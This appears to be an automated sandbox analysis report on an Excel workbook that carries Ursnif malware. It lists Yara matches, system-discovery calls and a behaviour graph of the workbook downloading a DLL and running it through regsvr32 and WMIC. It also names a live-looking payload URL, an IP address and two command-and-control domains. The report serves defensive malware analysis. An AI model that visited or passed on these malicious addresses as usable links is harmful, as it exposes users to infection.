Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 6_2_6E2A105E
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 cpuid 6_2_001A2E33
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 6_2_6E2A109B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 6_2_6E2A1C6F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 6_2_001A2E33

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 507191 Sample: inquiry[2021.09.23_12-51].xlsb Startdate: 21/10/2021 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for domain / URL 2->29 31 Found malware configuration 2->31 33 Multi AV Scanner detection for dropped file 2->33 35 8 other signatures 2->35 6 EXCEL.EXE 13 20 2->6         started        11 regsvr32.exe 2->11         started        process3 dnsIp4 27 iqwasithealth.com 50.87.248.41, 443, 49165 UNIFIEDLAYER-AS-1US United States 6->27 19 C:\Users\user\AppData\...\a435gfhs109[1].cms, PE32 6->19 dropped 21 C:\Users\Public\codec.dll, PE32 6->21 dropped 37 Document exploit detected (creates forbidden files) 6->37 39 Document exploit detected (UrlDownloadToFile) 6->39 13 WMIC.exe 6->13         started        16 regsvr32.exe 11->16         started        file5 signatures6 process7 dnsIp8 41 Creates processes via WMI 13->41 23 apt.updateffboruse.com 16->23 25 app.updatebrouser.com 16->25 43 System process connects to network (likely due to code injection or exploit) 16->43 45 Writes or reads registry keys via WMI 16->45 47 Writes registry values via WMI 16->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
50.87.248.41
 iqwasithealth.com United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
iqwasithealth.com 50.87.248.41 true
app.updatebrouser.com unknown unknown
apt.updateffboruse.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms true
  • Avira URL Cloud: safe
 unknown